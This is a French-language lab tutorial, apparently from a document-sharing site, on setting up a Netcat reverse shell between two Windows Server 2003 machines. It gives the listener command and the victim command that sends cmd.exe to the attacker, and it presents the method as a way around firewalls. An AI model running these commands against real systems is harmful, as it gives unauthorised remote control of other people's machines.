Click here to load reader
Upload
mehdi-makloufi
View
185
Download
2
Embed Size (px)
Citation preview
Reverse Shell avec Netcat
1 - Principe
Netcat est un outil réseau souvent appelé « TCP/IP swiss army knife ».
Avec cet outil on envoie des requêtes TCP/IP et on en reçoit. C’est très simple et très puissant !
Nous allons utiliser cet outil afin de se connecter à un ordinateur distant.
Ce qui est important à comprendre ici est le fait que nous allons « forcer » l’ordinateur distant à se
connecter à notre ordinateur et non l’inverse ! D’où le « Reverse » Shell. Nous ne faisons pas une
simple backdoor, qui est plus difficile à mettre en place car les pare-feux font leur boulot !
Ici la victime va ouvrir un prompt visible sur notre machine !
Cela permet de contourner les pare-feux, et nous allons voir comment.
2 - Exploit
Par groupe de 2. Nous utiliserons uniquement Windows Server 2003.
Nous allons récupérer l’outil « Netcat » à cette adresse :
http://joncraton.org/files/nc111nt.zip
Décompresser l’archive dans C:\Windows\system32
Lancez un prompt sur les 2 machines. (Exécuter -> cmd)
Puis aller dans le répertoire que vous venez de décompresser.
PARTIE ATTAQUE
Sur la machine qui attaque, nous allons écouter sur le port 3333 grâce à « netcat ».
Entrer cette commande :
nc.exe -v -L -p 3333 o –v permet d’afficher des détails en console o –L (listen) permet d’écouter les connexions entrantes o –p indique le port sur lequel on écoute
Désormais, n’importe quelle machine peut se connecter sur le port 3333 de notre machine
PARTIE VICTIME
La victime doit se connecter sur le port 3333 de la machine qui attaque
Elle doit exécuter un shell afin d’ouvrir une session
Ici nous allons le faire à la main pour rendre les choses plus simple.
Pour cela entrer cette commande :
nc.exe (ipdelautremachine) 3333 –e cmd.exe
o –e précise la commande à exécuter lorsqu’une connexion est établie
La connexion est établie et un shell s’est ouvert sur la machine attaquante !
Screenshot de la machine qui attaque :
Vous avez désormais un shell sur la machine victime.
Nous avons ici exécuté la commande cmd.exe lors de la connexion mais on peut ouvrir d’autres
programmes ! VNC par exemple afin d’avoir le bureau à distance !
3 - Conclusion
Le reverse shell est très puissant car il permet de contourner les pare-feux.
La victime vient à nous et non l’inverse comme dans une simple backdoor.